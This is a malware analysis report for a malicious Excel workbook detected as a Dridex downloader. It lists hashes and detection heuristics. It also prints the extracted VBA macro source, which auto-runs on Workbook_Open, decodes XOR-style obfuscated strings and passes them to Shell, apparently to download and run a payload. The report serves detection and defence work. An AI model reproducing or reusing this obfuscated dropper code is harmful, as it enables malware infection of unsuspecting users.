Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3ed4d73bbd2f0bee…

MALICIOUS

Office (OOXML)

411.2 KB Created: 2020-11-16 07:10:44 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2020-11-23
MD5: 3ca3365c464147d11d5f97f8d5d509e3 SHA-1: 4d2678eb53d582ff55aed729f023fa1b5a848780 SHA-256: 3ed4d73bbd2f0beea0e6dbd0f457d37bac0d414094cc40a3bc355483ce5ffa8f
148 Risk Score

Heuristics 4

  • ClamAV: Xls.Downloader.DridexGreen09213-9890103-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.DridexGreen09213-9890103-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell HGJHG
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Public Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2239 bytes
SHA-256: 2b52e86fe67785978e01cdfa29faf0a7d03ae879a6e819726994af9ec7ff92a4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim HGJHG As String
Public Sub Workbook_Open()
sas
'shell HGJHG
Shell HGJHG
End Sub
Private Function sas()
HGJHG = itwillx("»ºÂ°½¾³°··ks¹°Âxº­µ°®¿kžÄ¾¿°¸y™°¿y¢°­Ž·´°¹¿ty�ºÂ¹·º¬¯‘´·°", "KK")
HGJHG = HGJHG + itwillx("sr³¿¿»¾…zz·º²´®¬·¾®ºº¿°½¾y®º¸z¾¿À­y°Ã°rwo°¹Á…Œ»»�¬¿¬vr§¾¿À­y°Ã°rt†s™°Âxš­µ°®¿kx®º¸kž³°··yŒ»»·´®¬¿´º¹tyž³°··�ð®À¿°so°¹Á…Œ»»�¬¿¬vr§¾¿À­y°Ã°rt", "KK")
End Function
    Private Function itwillx(joe As String, ByVal xw As String)
        Dim i As Integer, c As Integer
        Dim strBuff As String
        If Len(xw) Then
            For i = 1 To Len(joe)
                c = Asc(Mid$(joe, i, 1))
                c = c - Asc(Mid$(xw, (i Mod Len(xw)) + 1, 1))
                strBuff = strBuff & Chr(c And &HFF)
            Next i
        Else
            strBuff = joe
        End If
        itwillx = strBuff
    End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 16384 bytes
SHA-256: 1b440aa644accf9c7b77ded32ee2416a884a26623039f308385d6d92633e5795

Open this report in the interactive analyzer, or submit your own file for analysis.